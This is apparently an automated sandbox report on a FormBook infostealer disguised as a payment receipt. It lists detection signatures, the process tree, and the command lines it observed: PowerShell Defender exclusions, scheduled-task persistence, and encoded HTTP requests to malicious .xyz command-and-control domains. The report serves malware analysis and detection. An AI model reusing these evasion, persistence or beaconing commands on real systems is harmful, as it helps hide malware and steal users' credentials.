Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PAYMENT RECEIPT_USD21,000.exe

Overview

General Information

Sample name:PAYMENT RECEIPT_USD21,000.exe
Analysis ID:1622568
MD5:917aa64000d9391e7f6644f3fe2805c8
SHA1:762fe40a55d991688d274b833ef26646ea47d606
SHA256:026eb5a5186c705c0be93317796f3203bee1d50716b77a842f14e9e322dd470e
Tags:exeuser-threatcat_ch
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Confidence:100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected non-DNS traffic on DNS port
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • PAYMENT RECEIPT_USD21,000.exe (PID: 1680 cmdline: "C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exe" MD5: 917AA64000D9391E7F6644F3FE2805C8)
    • powershell.exe (PID: 7096 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6776 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 1276 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\fttQgpyzkkc.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 2924 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7460 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 5612 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\fttQgpyzkkc" /XML "C:\Users\user\AppData\Local\Temp\tmp3A9E.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 2516 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegSvcs.exe (PID: 7304 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
      • VfJW2xm7a.exe (PID: 4180 cmdline: "C:\Program Files (x86)\rRvWLUQkWRUiDWcyGCVBPQFatIlfXSOAvcjgOpugHDmsMNsHfOXhuagmOYQRFvlzQ\jyn0JCT2oB.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
        • wlanext.exe (PID: 7816 cmdline: "C:\Windows\SysWOW64\wlanext.exe" MD5: 0D5F0A7CA2A8A47E3A26FB1CB67E118C)
          • VfJW2xm7a.exe (PID: 3628 cmdline: "C:\Program Files (x86)\rRvWLUQkWRUiDWcyGCVBPQFatIlfXSOAvcjgOpugHDmsMNsHfOXhuagmOYQRFvlzQ\VfJW2xm7a.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
          • firefox.exe (PID: 7964 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • fttQgpyzkkc.exe (PID: 7436 cmdline: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exe MD5: 917AA64000D9391E7F6644F3FE2805C8)
    • schtasks.exe (PID: 7608 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\fttQgpyzkkc" /XML "C:\Users\user\AppData\Local\Temp\tmp6603.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7616 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegSvcs.exe (PID: 7680 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000011.00000002.4517196655.00000000030B0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000011.00000002.4517755223.00000000033C0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000009.00000002.2279407307.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000009.00000002.2280315189.0000000000FE0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000011.00000002.4517662913.0000000003370000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 4 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            9.2.RegSvcs.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              9.2.RegSvcs.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exe", ParentImage: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exe, ParentProcessId: 1680, ParentProcessName: PAYMENT RECEIPT_USD21,000.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exe", ProcessId: 7096, ProcessName: powershell.exe
                Sigma detected: Powershell Defender Exclusion
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exe", ParentImage: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exe, ParentProcessId: 1680, ParentProcessName: PAYMENT RECEIPT_USD21,000.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exe", ProcessId: 7096, ProcessName: powershell.exe
                Sigma detected: Suspicious Add Scheduled Task Parent
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\fttQgpyzkkc" /XML "C:\Users\user\AppData\Local\Temp\tmp6603.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\fttQgpyzkkc" /XML "C:\Users\user\AppData\Local\Temp\tmp6603.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exe, ParentImage: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exe, ParentProcessId: 7436, ParentProcessName: fttQgpyzkkc.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\fttQgpyzkkc" /XML "C:\Users\user\AppData\Local\Temp\tmp6603.tmp", ProcessId: 7608, ProcessName: schtasks.exe
                Sigma detected: Suspicious Schtasks From Env Var Folder
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\fttQgpyzkkc" /XML "C:\Users\user\AppData\Local\Temp\tmp3A9E.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\fttQgpyzkkc" /XML "C:\Users\user\AppData\Local\Temp\tmp3A9E.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exe", ParentImage: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exe, ParentProcessId: 1680, ParentProcessName: PAYMENT RECEIPT_USD21,000.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\fttQgpyzkkc" /XML "C:\Users\user\AppData\Local\Temp\tmp3A9E.tmp", ProcessId: 5612, ProcessName: schtasks.exe
                Sigma detected: Non Interactive PowerShell Process Spawned
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exe", ParentImage: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exe, ParentProcessId: 1680, ParentProcessName: PAYMENT RECEIPT_USD21,000.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exe", ProcessId: 7096, ProcessName: powershell.exe

                Persistence and Installation Behavior

                barindex
                Sigma detected: Scheduled temp file as task from temp location
                Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\fttQgpyzkkc" /XML "C:\Users\user\AppData\Local\Temp\tmp3A9E.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\fttQgpyzkkc" /XML "C:\Users\user\AppData\Local\Temp\tmp3A9E.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exe", ParentImage: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exe, ParentProcessId: 1680, ParentProcessName: PAYMENT RECEIPT_USD21,000.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\fttQgpyzkkc" /XML "C:\Users\user\AppData\Local\Temp\tmp3A9E.tmp", ProcessId: 5612, ProcessName: schtasks.exe

                Suricata Signatures

                No Suricata rule has matched

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Multi AV Scanner detection for dropped file
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exeReversingLabs: Detection: 36%
                Multi AV Scanner detection for submitted file
                Source: PAYMENT RECEIPT_USD21,000.exeReversingLabs: Detection: 36%
                Source: PAYMENT RECEIPT_USD21,000.exeVirustotal: Detection: 44%Perma Link
                Yara detected FormBook
                Source: Yara matchFile source: 9.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000011.00000002.4517196655.00000000030B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000011.00000002.4517755223.00000000033C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.2279407307.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.2280315189.0000000000FE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000011.00000002.4517662913.0000000003370000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.2281808721.0000000001580000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000010.00000002.4518790088.0000000003230000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Joe Sandbox ML detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: PAYMENT RECEIPT_USD21,000.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: PAYMENT RECEIPT_USD21,000.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: dLtX.pdb source: PAYMENT RECEIPT_USD21,000.exe, fttQgpyzkkc.exe.0.dr
                Source: Binary string: dLtX.pdbSHA256 source: PAYMENT RECEIPT_USD21,000.exe, fttQgpyzkkc.exe.0.dr
                Source: Binary string: RegSvcs.pdb, source: wlanext.exe, 00000011.00000002.4519605588.0000000003EAC000.00000004.10000000.00040000.00000000.sdmp, wlanext.exe, 00000011.00000002.4517846473.000000000342E000.00000004.00000020.00020000.00000000.sdmp, VfJW2xm7a.exe, 00000012.00000000.2347769704.000000000281C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000013.00000002.2573998008.00000000259FC000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: RegSvcs.exe, 00000009.00000002.2280486106.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, wlanext.exe, 00000011.00000003.2281404075.00000000036D4000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, 00000011.00000002.4519000004.0000000003A1E000.00000040.00001000.00020000.00000000.sdmp, wlanext.exe, 00000011.00000002.4519000004.0000000003880000.00000040.00001000.00020000.00000000.sdmp, wlanext.exe, 00000011.00000003.2279650402.0000000003522000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: RegSvcs.exe, RegSvcs.exe, 00000009.00000002.2280486106.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, wlanext.exe, 00000011.00000003.2281404075.00000000036D4000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, 00000011.00000002.4519000004.0000000003A1E000.00000040.00001000.00020000.00000000.sdmp, wlanext.exe, 00000011.00000002.4519000004.0000000003880000.00000040.00001000.00020000.00000000.sdmp, wlanext.exe, 00000011.00000003.2279650402.0000000003522000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wlanext.pdb source: RegSvcs.exe, 00000009.00000002.2279804483.0000000000C57000.00000004.00000020.00020000.00000000.sdmp, VfJW2xm7a.exe, 00000010.00000003.2586798882.0000000001537000.00000004.00000020.00020000.00000000.sdmp, VfJW2xm7a.exe, 00000010.00000003.2218555410.0000000001524000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: RegSvcs.pdb source: wlanext.exe, 00000011.00000002.4519605588.0000000003EAC000.00000004.10000000.00040000.00000000.sdmp, wlanext.exe, 00000011.00000002.4517846473.000000000342E000.00000004.00000020.00020000.00000000.sdmp, VfJW2xm7a.exe, 00000012.00000000.2347769704.000000000281C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000013.00000002.2573998008.00000000259FC000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: wlanext.pdbGCTL source: RegSvcs.exe, 00000009.00000002.2279804483.0000000000C57000.00000004.00000020.00020000.00000000.sdmp, VfJW2xm7a.exe, 00000010.00000003.2586798882.0000000001537000.00000004.00000020.00020000.00000000.sdmp, VfJW2xm7a.exe, 00000010.00000003.2218555410.0000000001524000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: VfJW2xm7a.exe, 00000010.00000000.2203131007.00000000006AF000.00000002.00000001.01000000.0000000D.sdmp, VfJW2xm7a.exe, 00000012.00000002.4517727575.00000000006AF000.00000002.00000001.01000000.0000000D.sdmp
                Source: C:\Users\user\AppData\Roaming\fttQgpyzkkc.exeCode function: 4x nop then jmp 0730B18Ah10_2_0730B5CD

                Networking

                barindex
                Performs DNS queries to domains with low reputation
                Source: DNS query: www.needethereum.xyz
                Source: DNS query: www.myfort.xyz
                Source: DNS query: www.kedutaan.xyz
                Source: DNS query: www.nevath.xyz
                Source: DNS query: www.fstudy.xyz
                Source: DNS query: www.conpactum.xyz
                Source: DNS query: www.nagwagi.xyz
                Source: global trafficTCP traffic: 192.168.2.5:53200 -> 162.159.36.2:53
                Source: Joe Sandbox ViewIP Address: 13.248.169.48 13.248.169.48
                Source: Joe Sandbox ViewIP Address: 47.83.1.90 47.83.1.90
                Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
                Source: Joe Sandbox ViewASN Name: VNPT-AS-VNVNPTCorpVN VNPT-AS-VNVNPTCorpVN
                Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /4vzl/?RF0t=ch5dbZhpJZwxM&fjF4t=34Lyoguue/ZRNqb6y592ViDXl1ETk4WFJ/hL/W3KZfXMHxeZqgTMo5RLneqnA8kgjAhzHF0e7jsaAudU+8CwvVjATSxT1ARM9ZETmUao+kHbXujpBnqMKlG7RRXCivG0nw== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enConnection: closeHost: www.needethereum.xyzUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; yie11; rv:11.0) like Gecko
                Source: global trafficHTTP traffic detected: GET /xqx9/?fjF4t=yKFRxSnc59btqEDWkG4f1mA08fQtykFKEHyRKSiaROYhOb0ocaHjQpR8CouySbLt1Ca/sA3ZASHSjJCktm40YHEO0LVyiREwOtmtzF7Jk7kiZIBnx0g4uHKK1v//NosybA==&RF0t=ch5dbZhpJZwxM HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enConnection: closeHost: www.myfort.xyzUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; yie11; rv:11.0) like Gecko
                Source: global trafficHTTP traffic detected: GET /2f0x/?fjF4t=KttBANyMFCMHyjVlhguaw4w+FOhxb+RFMCG1RBkM4lZRj0tz+pUlcfZuaGNcwmkG/tlADW94/u/n6qVk66ZBjnaa65ODvbXTfHQnH9YQE2AekJuH1z6JciJdqtungYribQ==&RF0t=ch5dbZhpJZwxM HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enConnection: closeHost: www.kedutaan.xyzUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; yie11; rv:11.0) like Gecko
                Source: global trafficHTTP traffic detected: GET /w1jw/?fjF4t=FEsgf818Qy4NuwHBEIOvD988sEsBYT1YIqxYhkBisKCh+ZsP2UzNKQMRoHyY3GTw2NtU/ASHEwd/ObWWKYOm3As7v7YGAnBPRCCHEokvb4U326rMZugykuz2GNZjV6Uq/Q==&RF0t=ch5dbZhpJZwxM HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enConnection: closeHost: www.primepath.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; yie11; rv:11.0) like Gecko
                Source: global trafficHTTP traffic detected: GET /rkj7/?fjF4t=/5TEs0/gy+K4LCfX0N5V2DRC24LIq0ltkM4FEpm3l/SyyBvzaEu9TquaFMDCNHy8LAwEyrpN+W7o0magr9hCI+z9nI91eJEVHu5WBNxARfCUGLvs1K/9iv05n9OhXDh8ug==&RF0t=ch5dbZhpJZwxM HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enConnection: closeHost: www.limanbetgirislinki.fitUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; yie11; rv:11.0) like Gecko
                Source: global trafficHTTP traffic detected: GET /puqt/?fjF4t=drGrhokrlRrEYuDWt0OJz4Ng6KJaghcbR1C/f3uJtjeKiD81PgtT6wBn+7K3ePb2401ZwAv82H3TfvfvLQM6N7VBZ3mjq2uRkdcB946Aq6KqI+OPqxc4Zv4uRJqxgh4Qyg==&RF0t=ch5dbZhpJZwxM HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enConnection: closeHost: www.amtdevelopment.proUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; yie11; rv:11.0) like Gecko
                Source: global trafficHTTP traffic detected: GET /t592/?RF0t=ch5dbZhpJZwxM&fjF4t=5G9JgWCrRv/lf92zCOZkKJykrgHBYS4VWLV72Qu70fhIXGvAtKpGNi3j5YgE2pTksYz/+Gu6WCPD40ehRSX/GShHF177bl+TjQnArXr7bgkGGddGUN4R/KQnNEe9GlDvag== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enConnection: closeHost: www.amzavy.infoUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; yie11; rv:11.0) like Gecko
                Source: global trafficHTTP traffic detected: GET /9coe/?fjF4t=G107bRRRDsnoWJ2JhClzu0zeUy/skI/DtoHAa4UfWjmX8GkD4kiW6knx/7EXVkNc3Q6v4cEQl/XbcNsFTcgd2vNzs8EutXPjgPFQGc0U76fueDyWor3EeiPytQW0W+TLHw==&RF0t=ch5dbZhpJZwxM HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enConnection: closeHost: www.thisisnonft.studioUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; yie11; rv:11.0) like Gecko
                Source: global trafficHTTP traffic detected: GET /pc8v/?fjF4t=RA6YG/kITrTUzv1Ir6oMFjfpkiqkIwOu1GrMpQfsofu9KgfV866pOx/zpeHqw3yYMw1wUvSAS0XIUUtoYyLhFXHuejN1GQTBbcaAURWT0yZi4qilazCHzNhJc4tuU/rPvw==&RF0t=ch5dbZhpJZwxM HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enConnection: closeHost: www.nevath.xyzUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; yie11; rv:11.0) like Gecko
                Source: global trafficHTTP traffic detected: GET /v2vx/?fjF4t=HeKInfSBrNZWMbEH+jRwpgXlugazE5tEyQKa3d84OZNKksDn2kRDQpi07vt+3gKmBpdSmetPPuOzzYFML0E9gKtonHsogB9osPTHt5AJmdlwX9Dj8hBRoR9jaIy+VNF+xQ==&RF0t=ch5dbZhpJZwxM HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enConnection: closeHost: www.fstudy.xyzUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; yie11; rv:11.0) like Gecko
                Source: global trafficHTTP traffic detected: GET /0la8/?fjF4t=JeHLTm9NbM7uXLGkYCdiXWBMiWKfyaOxQwSOG2ODV+sj/JIjYRLvMo1a7ITBF45D7AOgtjIjNFzQOPLUJtEsboGaUJsDFDF1nQuu/0as5yoaTY3QBQc4o1BCqzJlsgLV6g==&RF0t=ch5dbZhpJZwxM HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enConnection: closeHost: www.conpactum.xyzUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; yie11; rv:11.0) like Gecko
                Source: global trafficHTTP traffic detected: GET /rg2p/?fjF4t=TlKFe+d35Apu3/mseXpuPf41KXdbz4jzYuDfc77EpcUq6bydtIGWQj5xXXa0XlIvqgCgN05XiUVJLc/fLNZa0aXVGUu4UDC5CBhHDcV+TYT/criYkAzFObXguKWBgmefaQ==&RF0t=ch5dbZhpJZwxM HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enConnection: closeHost: www.fandatv.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; yie11; rv:11.0) like Gecko
